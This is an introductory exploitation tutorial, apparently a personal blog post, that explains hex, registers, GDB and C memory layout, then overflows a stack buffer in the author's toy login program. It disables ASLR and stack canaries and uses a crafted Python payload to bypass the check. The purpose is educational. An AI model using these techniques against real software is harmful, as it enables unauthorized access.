Jul 10, 2017

Exploring the Buffer

* Warning: My english sux. 
"Computers, in a slightly schizoid fashion, work in base 2 and base 16 - all the same time." - Jeff Duntemann
The natural way to find a vulnerability in a program is to disassemble it, so we need to know this weird base 16 number system and also some assembly. If you don't know them yet, keep reading; otherwise just skip this intro.

Basics of Hexadecimal:
The base 16, or hexadecimal, number system has 16 digits: the usual 0-9 plus six additional digits written A-F. This makes hex extremely useful for representing binary data. One hex digit is equal to one nibble, or 4 bits, of data. Two hex digits are equal to a byte, or 8 bits. Eight hex digits are equal to a 32-bit word, and sixteen hex digits are equal to a 64-bit word. The following chart counts in hexadecimal (HEX), decimal (DEC) and binary (BINARY) to show what is going on:

HEX   DEC   BINARY       HEX   DEC   BINARY       HEX  DEC   BINARY
----  ----  ----------   ----  ----  ----------   ---- ----  ----------
0x00  (00)  (00000000)   0x10  (16)  (00010000)   0x20 (32)  (00100000)
0x01  (01)  (00000001)   0x11  (17)  (00010001)   0x21 (33)  (00100001)
0x02  (02)  (00000010)   0x12  (18)  (00010010)   0x22 (34)  (00100010)
0x03  (03)  (00000011)   0x13  (19)  (00010011)   0x23 (35)  (00100011)
0x04  (04)  (00000100)   0x14  (20)  (00010100)   0x24 (36)  (00100100)
0x05  (05)  (00000101)   0x15  (21)  (00010101)   0x25 (37)  (00100101)
0x06  (06)  (00000110)   0x16  (22)  (00010110)   0x26 (38)  (00100110)
0x07  (07)  (00000111)   0x17  (23)  (00010111)   0x27 (39)  (00100111)
0x08  (08)  (00001000)   0x18  (24)  (00011000)   0x28 (40)  (00101000)
0x09  (09)  (00001001)   0x19  (25)  (00011001)   0x29 (41)  (00101001)
0x0A  (10)  (00001010)   0x1A  (26)  (00011010)   0x2A (42)  (00101010)
0x0B  (11)  (00001011)   0x1B  (27)  (00011011)   0x2B (43)  (00101011)
0x0C  (12)  (00001100)   0x1C  (28)  (00011100)   0x2C (44)  (00101100)
0x0D  (13)  (00001101)   0x1D  (29)  (00011101)   0x2D (45)  (00101101)
0x0E  (14)  (00001110)   0x1E  (30)  (00011110)   0x2E (46)  (00101110)
0x0F  (15)  (00001111)   0x1F  (31)  (00011111)   0x2F (47)  (00101111)

For a byte this chart would continue until it reached 0xFF (255) (11111111). 255 is the largest unsigned number that can be represented with a single byte.

Memory and Registers:
Memory is a collection of bytes, each with its own address. A 64-bit machine has 2⁶⁴ possible addresses. Each architecture has its own machine language and therefore its own assembly language; for x86 there are two main assembly syntaxes, AT&T and Intel. The processor registers are like a special kind of variable built into the CPU. We can use a debugger (such as GDB) to inspect the memory and the registers, step by step.

General purpose registers: 
They act as temporary variables for the running program. On 32-bit x86 the general purpose registers are: EAX (accumulator), EBX (base), ECX (counter), EDX (data), ESI (source index), EDI (destination index), ESP (stack pointer), EBP (base pointer). On x86-64 they are extended to 64 bits and named RAX, RBX and so on. The most important register for exploits is not a general purpose one: it is the instruction pointer, called IP (16 bit), EIP (32 bit) or RIP (64 bit), which holds the address of the next instruction to execute.

Some assembly operations:
mov:  copy the value from source to destination.
sub:  subtract.
inc:  increment by one.
cmp:  compare two values.
jmp:  jump to a different part of the code.
jle:  jump if less than or equal to (used to build if/then/else).
call: push the return address onto the stack and then jump to a function.
ret:  pop the return address off the stack at the end of the function and jump there. That address goes into the instruction pointer, so execution continues right after the call once the function has completed.

GDB useful commands: 
(gdb) break main        set a breakpoint on main function
(gdb) run               run the program with current arguments
(gdb) x/x $rip          examine the memory at $rip, in hex
(gdb) x/o $rip          same, in octal
(gdb) x/u $rip          same, in unsigned decimal (base 10)
(gdb) x/t $rip          same, in binary
(gdb) x/i $rip          disassemble the instruction at $rip
(gdb) x/10i main        disassemble the first 10 instructions of main
(gdb) x/3xw             examine 3 four-byte words in hex (from the last examined address)
(gdb) disas main        disassemble the code of main
(gdb) bt                print the stack backtrace
(gdb) c                 continue the program

C Memory Segmentation:
The memory of a compiled program is divided into 5 segments:
1. Text: contains the machine instructions of the program. Marked as read-only, with a fixed length.
2. Data: contains the initialized global and static variables. Also has a fixed length.
3. Bss: contains the uninitialized global and static variables.
4. Heap: contains the dynamic memory requested via C's malloc(). It doesn't have a fixed length and grows upward, toward higher addresses.
5. Stack: a collection of stack frames, used as temporary storage for local variables and function call context. It is LIFO (last in, first out), so the first item placed on the stack is the last one to leave it. It grows downward, toward lower addresses, and it is what GDB's backtrace looks at.
The C compiler needs to know the type of every variable to know how much memory it takes. Because the memory is divided into segments, a program that tries to access an address outside the memory it is allowed to use (for example, by reading a command-line argument that was never given) gets the famous 'segmentation fault'. Usually these unexpected errors just crash the program, but an exploit can steer the corruption so that, instead of crashing, the process keeps running and does what the attacker wants.

An exploit uses a vulnerability in a program to take control of the running code or system, allowing privilege escalation and other attacks. It is a way to make a program do whatever you like, even if the program was written to do something else. Many exploits rely on memory corruption, including common techniques such as buffer overflows. A buffer overflow, as the name says, means writing more data into a buffer than it can hold. The most common buffer in C is an array.

First BoF:
To run our vulnerable code, we first need to disable Address Space Layout Randomization (ASLR), a defense feature that makes memory corruption vulnerabilities harder to exploit.
To disable it, run: $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable it again, run: $ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
You can see your randomized stack address with this code:
#include <stdio.h>

int main(void) {
        /* GCC extension: bind i to the stack pointer register */
        register int i asm("esp");
        printf("$esp = %#010x\n", i);
        return 0;
}
The register keyword asks the compiler to keep the variable in a CPU register instead of RAM, and the asm("esp") part (a GCC extension) ties it to the stack pointer, so printing i displays the current value of esp in hexadecimal. Running it twice we get two different addresses:
$ gcc esp.c 
$ ./a.out 
$esp = 0x07fa7750
$ ./a.out 
$esp = 0x7fb76d60
After disabling ASLR we get the same address on every run:
$ ./a.out 
$esp = 0xffffdda0

Disassembling with GDB:
To make our bof.c exploitable we also need to compile it without stack canaries (the stack protector):
$ gcc bof.c -o bof -fno-stack-protector
$ gdb ./bof
(gdb) run 0x231da6e1
Starting program: /home/zeldani/hacking/bof 0x231da6e1
Access Denied.
(gdb) disas login
   0x0000000000400587 <+33>: callq  0x400430 <strcpy@plt>
   0x000000000040058c <+38>: cmpl   $0x231da6e1,-0x4(%rbp)
   0x0000000000400593 <+45>: jne    0x4005a8 <login+66>
   0x0000000000400595 <+47>: mov    $0x400674,%edi
   0x000000000040059a <+52>: callq  0x400440 <puts@plt>
   0x000000000040059f <+57>: movl   $0x1,-0x4(%rbp)
   0x00000000004005a6 <+64>: jmp    0x4005b2 <login+76>
   0x00000000004005a8 <+66>: mov    $0x400680,%edi
   0x00000000004005ad <+71>: callq  0x400440 <puts@plt>
   0x00000000004005b2 <+76>: nop
   0x00000000004005b3 <+77>: leaveq 
   0x00000000004005b4 <+78>: retq   
End of assembler dump.

Let's break at the callq, cmpl and retq instructions to see what is happening:
(gdb) break *0x0000000000400587
(gdb) break *0x000000000040058c
(gdb) break *0x000000000040059a
(gdb) break *0x00000000004005ad
(gdb) break *0x00000000004005b4

(gdb) run 0x231da6e1
Starting program: /home/zeldani/hacking/bof 0x231da6e1
Breakpoint 1, 0x00000000004005d7 in login ()
(gdb) i r
rax            0x7fffffffdd00 140737488346368
rbx            0x0   0
rcx            0x0   0
rdx            0x7fffffffe217 140737488347671
rsi            0x7fffffffe217 140737488347671
rdi            0x7fffffffdd00 140737488346368
rbp            0x7fffffffdd20 0x7fffffffdd20
rsp            0x7fffffffdcf0 0x7fffffffdcf0

Subtracting rax (the start of the buffer, which is also the destination passed to strcpy in rdi) from rbp gives the distance in bytes between the buffer and the base of the stack frame:
$ echo 'ibase=16;7FFFFFFFDD20-7FFFFFFFDD00' | bc 
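bc prints 32. The variable compared against 0x231da6e1 lives at -0x4(%rbp), 4 bytes below rbp, so it starts 32 - 4 = 28 bytes after the beginning of the buffer. Now that we know the distance, we can overflow the buffer using 28 'a's as padding, followed by the value 0x231da6e1 in little endian format, where the least significant byte is stored first, so the bytes are written in reverse order: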
$ ./bof $(python -c "print 'a'*28+'\xe1\xa6\x1d\x23'")
Welcome! :)

It works! The 28 'a' bytes (0x61 in hex) filled the buffer, and the 4 bytes that followed overflowed into the adjacent variable, setting it to 0x231da6e1. The cmpl check now passes, so we get the welcome message even though the program never set that value itself. By overflowing the buffer we took control of a variable that decides which branch is executed.
* Thank you my sis EMPixie for sharing your knowledge about exploits and for writing about hexadecimal. <3

* References:
Hacking: The Art of Exploitation, by Jon Erickson
